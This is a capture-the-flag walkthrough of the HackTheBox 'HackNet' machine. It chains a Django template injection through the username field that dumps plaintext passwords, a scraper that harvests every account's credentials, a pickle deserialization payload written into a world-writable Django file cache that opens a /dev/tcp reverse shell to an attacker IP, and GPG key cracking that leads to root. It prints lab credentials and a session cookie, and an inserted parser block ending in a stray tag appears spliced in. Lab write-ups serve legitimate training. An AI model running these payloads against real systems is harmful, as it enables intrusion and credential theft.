# HTB-HackNet

Create an account and log in.


We can edit our user profile and upload a profile picture. Testing for insecure file upload vulnerabilities yielded no results.

One user in the search results looks odd; I suspect we need to read information from that account.

Trying other functions, I found two endpoints:
* GET /like/<POST_ID> - Likes a post
* GET /likes/<POST_ID> - Lists all users that liked the post
After liking a post and clicking its likes, the list of users who liked it appears.
I changed my username to `{{ users }}`

then liked a post and opened its likes again. The likers list now shows the template variable rendered, which means the username is being compiled into the template source rather than passed in as context data (a server-side template injection):


```
<QuerySet [
<SocialUser: cyberghost>,
<SocialUser: shadowcaster>,
<SocialUser: glitch>,
<SocialUser: netninja>,
<SocialUser: exploit_wizard>,
<SocialUser: whitehat>,
<SocialUser: deepdive>,
<SocialUser: virus_viper>,
<SocialUser: brute_force>,
<SocialUser: {{ users }}>
]>
```
This [link](https://python.plainenglish.io/ssti-django-querysets-9de55c46cd1a) has some useful QuerySet tricks.
I tried `{{users.values}}`

Doing the same as before, the likers list now shows every column of the user table, usernames and plaintext passwords included:

```
<QuerySet [{'id': 2, 'email': 'hexhunter@ciphermail.com', 'username': 'hexhunter', 'password': 'H3xHunt3r!', 'picture': '2.jpg', 'about': 'A seasoned reverse engineer specializing in binary exploitation. Loves diving into hex editors and uncovering hidden data.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 6, 'email': 'shadowcaster@darkmail.net', 'username': 'shadowcaster', 'password': 'Sh@d0wC@st!', 'picture': '6.jpg', 'about': 'Specializes in social engineering and OSINT techniques. A master of blending into the digital shadows.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 7, 'email': 'blackhat_wolf@cypherx.com', 'username': 'blackhat_wolf', 'password': 'Bl@ckW0lfH@ck', 'picture': '7.png', 'about': 'A black hat hacker with a passion for ransomware development. Has a reputation for leaving no trace behind.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 9, 'email': 'glitch@cypherx.com', 'username': 'glitch', 'password': 'Gl1tchH@ckz', 'picture': '9.png', 'about': 'Specializes in glitching and fault injection attacks. Loves causing unexpected behavior in software and hardware.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 12, 'email': 'codebreaker@ciphermail.com', 'username': 'codebreaker', 'password': 'C0d3Br3@k!', 'picture': '12.png', 'about': 'A programmer with a talent for writing malicious code and cracking software protections. 
Loves breaking encryption algorithms.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': False, 'is_hidden': False, 'two_fa': False}, {'id': 16, 'email': 'shadowmancer@cypherx.com', 'username': 'shadowmancer', 'password': 'Sh@d0wM@ncer', 'picture': '16.png', 'about': 'A master of disguise in the digital world, using cloaking techniques and evasion tactics to remain unseen.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 21, 'email': 'whitehat@darkmail.net', 'username': 'whitehat', 'password': 'Wh!t3H@t2024', 'picture': '21.jpg', 'about': 'An ethical hacker with a mission to improve cybersecurity. Works to protect systems by exposing and patching vulnerabilities.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 24, 'email': 'brute_force@ciphermail.com', 'username': 'brute_force', 'password': 'BrUt3F0rc3#', 'picture': '24.jpg', 'about': 'Specializes in brute force attacks and password cracking. Loves the challenge of breaking into locked systems.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': False, 'two_fa': False}, {'id': 25, 'email': 'shadowwalker@hushmail.com', 'username': 'shadowwalker', 'password': 'Sh@dowW@lk2024', 'picture': '25.jpg', 'about': 'A digital infiltrator who excels in covert operations. Always finds a way to walk through the shadows undetected.', 'contact_requests': 0, 'unread_messages': 0, 'is_public': False, 'is_hidden': False, 'two_fa': False}, {'id': 29, 'email': 'a@a.com', 'username': '{{users.values}}', 'password': '1', 'picture': 'profile.png', 'about': '', 'contact_requests': 0, 'unread_messages': 0, 'is_public': True, 'is_hidden': True, 'two_fa': False}]>
```
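To turn that dump into records without one regex per field, here is an added parser (my example, not the page's script). It runs `ast.literal_eval` over the QuerySet repr, which copes with an apostrophe or an escaped newline inside an `about` text, re-escapes a line break that a browser or copy-paste may have introduced inside a string, and flags the truncation Django's `QuerySet.__repr__` applies after 20 rows. The fixtures are constructed from the shape of the dump above.

```python
import ast
import re

# Constructed fixtures in the shape of the {{ users.values }} dump above
# (trimmed to a few columns); not the target's full data.
SAMPLE_DUMP = (
    "<QuerySet [{'id': 2, 'email': 'hexhunter@ciphermail.com', 'username': 'hexhunter', "
    "'password': 'H3xHunt3r!', 'about': \"Loves hex editors; isn't shy.\", "
    "'is_public': True, 'is_hidden': False, 'two_fa': False}, "
    "{'id': 29, 'email': 'a@a.com', 'username': '{{users.values}}', 'password': '1', "
    "'about': '', 'is_public': True, 'is_hidden': True, 'two_fa': False}]>"
)

# Same dump after a browser turned the repr's escaped newline into a real
# line break inside a string (as in the dump above): invalid as a Python
# literal until it is re-escaped.
NEWLINE_DUMP = SAMPLE_DUMP.replace("; isn't shy.", "\nisn't shy.")

# What a likers list of more than 20 users renders as: Django's
# QuerySet.__repr__ replaces the 21st row with a marker string.
TRUNCATED_DUMP = (
    "<QuerySet [{'id': 1, 'email': 'x@example.com', 'username': 'x', 'password': 'p', "
    "'is_public': True, 'is_hidden': False, 'two_fa': False}, "
    "'...(remaining elements truncated)...']>"
)

QUERYSET_RE = re.compile(r"<QuerySet\s*(\[.*\])\s*>", re.DOTALL)


def parse_queryset_dump(text):
    """Parse the repr of a QuerySet of dicts into (records, truncated).

    ast.literal_eval understands the quoting the repr uses, so an apostrophe
    or an escaped newline inside 'about' cannot shift fields the way a
    per-field regex can. A trailing '...(remaining elements truncated)...'
    string is removed and reported instead of being mistaken for a record."""
    m = QUERYSET_RE.search(text)
    if not m:
        raise ValueError("no <QuerySet [...]> repr in text")
    body = m.group(1)
    try:
        items = ast.literal_eval(body)
    except (SyntaxError, ValueError):
        # A real line break inside a string literal is a syntax error;
        # re-escape it and retry once.
        items = ast.literal_eval(body.replace("\r", "").replace("\n", "\\n"))
    truncated = bool(items) and isinstance(items[-1], str) and "truncated" in items[-1]
    if truncated:
        items = items[:-1]
    if not all(isinstance(r, dict) for r in items):
        raise ValueError("expected a list of dicts; render {{ users.values }}, not {{ users }}")
    return items, truncated


def credentials(records):
    """email:password:username lines, the format the page's script prints."""
    return [f"{r['email']}:{r['password']}:{r['username']}" for r in records]


def hidden_accounts(records):
    """Accounts with is_hidden set, which normal listings would not show."""
    return [r for r in records if r.get("is_hidden")]


if __name__ == "__main__":
    records, truncated = parse_queryset_dump(SAMPLE_DUMP)
    for line in credentials(records):
        print(line)
    for r in hidden_accounts(records):
        print("hidden:", r["username"])
    if truncated:
        print("warning: list was cut short by QuerySet repr; split the users across posts")
</test>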
So we need a script to pull every user's data.
It logs in with my account, likes every post and fetches each likes page, taking the last `<img>` title and checking that it contains `<QuerySet`; if it does not, it likes the post again and retries. I use a regex to find the `<img>` tags, and on the right one further regexes to pull out username, password and email:
```python
import html
import re

import requests

url = "http://hacknet.htb"
# Session of the account whose username is set to {{users.values}}
headers = {"Cookie": "csrftoken=EaItn7JfwzM0iH167M1YFtPDyIhlingh; sessionid=hv26i0t5dw4nz0dl40ko6n13heyu8unc"}
all_users = set()

for i in range(1, 31):
    # /like/<id> toggles our like; /likes/<id> renders every liker's username
    # into an <img title="..."> and so evaluates the template payload
    requests.get(f"{url}/like/{i}", headers=headers)
    text = requests.get(f"{url}/likes/{i}", headers=headers).text
    img_titles = re.findall(r'<img [^>]*title="([^"]*)"', text)
    if not img_titles:
        continue
    last_title = html.unescape(img_titles[-1])
    if "<QuerySet" not in last_title:
        # Payload did not render (the like may have been toggled off): like again and retry
        requests.get(f"{url}/like/{i}", headers=headers)
        text = requests.get(f"{url}/likes/{i}", headers=headers).text
        img_titles = re.findall(r'<img [^>]*title="([^"]*)"', text)
        if img_titles:
            last_title = html.unescape(img_titles[-1])
    emails = re.findall(r"'email': '([^']*)'", last_title)
    passwords = re.findall(r"'password': '([^']*)'", last_title)
    usernames = re.findall(r"'username': '([^']*)'", last_title)
    for email, p, username in zip(emails, passwords, usernames):
        all_users.add(f"{email}:{p}:{username}")

for item in all_users:
    print(item)
```
After a few minutes I get all the accounts.

So the hidden account is mikey@hacknet.htb:mYd4rks1dEisH3re:backdoor_bandit
Then SSH in as mikey to get the user flag (you can confirm mikey's password with hydra first).

We need to move laterally to sandy and crack the GPG-encrypted file.

Django supports several cache backends (LocMemCache, FileBasedCache, Memcached, Redis, database). This application uses the file-based one, which serialises each entry with pickle into a file under the configured `LOCATION`; the directory here is `/var/tmp/django_cache/`, the same path the Django docs use in their example.
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/django.html#pickle-backed-session-cookie-rce
Key observations:
* The directory is world-writable (777 permissions)
* It is owned by user sandy and group www-data
* Django stores cache entries here as pickle files (`*.djcache`) and unpickles them on every read
Visiting /explore (or refreshing it) makes Django write a cache file there.

I use [this method](https://davidhamann.de/2020/04/05/exploiting-python-pickle/) to build a pickle that spawns a reverse shell when it is loaded:
```python
import base64
import os
import pickle


class Exploit:
    # __reduce__ tells the unpickler to call os.system(<reverse shell>) on load
    def __reduce__(self):
        return (os.system, ('bash -c "bash -i >& /dev/tcp/10.10.16.65/4444 0>&1"',))


payload = base64.b64encode(pickle.dumps(Exploit()))
print(payload.decode())
```

Visit /explore (or refresh it) so Django creates the cache files, then write the payload into every cache file. Decode the base64 from the script first (`base64 -d`): Django reads the file with `pickle.load`, so it must contain the raw pickle bytes, not the base64 text.

Refresh /explore and a shell as sandy comes back.

Remember the GPG-encrypted files in the website directory above? We need the private key to decrypt them.
I upload linpeas.sh as sandy

and find the private key store in /home/sandy/.gnupg/private-keys-v1.d


I copy every file from /home/sandy/.gnupg/private-keys-v1.d and /var/www/HackNet/backups/ to /tmp/test

and move them all to my Kali box.


Convert the GPG key to a crackable hash with gpg2john and crack it with john (private-keys-v1.d holds gpg-agent's per-key files; to export the key in OpenPGP form, gpg also needs the matching public key in its keyring, so bring the keyring along if the export complains).

Import the GPG key and decrypt the backup.



Trying the other files: when I open backup2.sql and search for passwords, the database dump contains the root password.

root:h4ck3rs4re3veRywh3re99
SSH with it works, and we get the root flag.
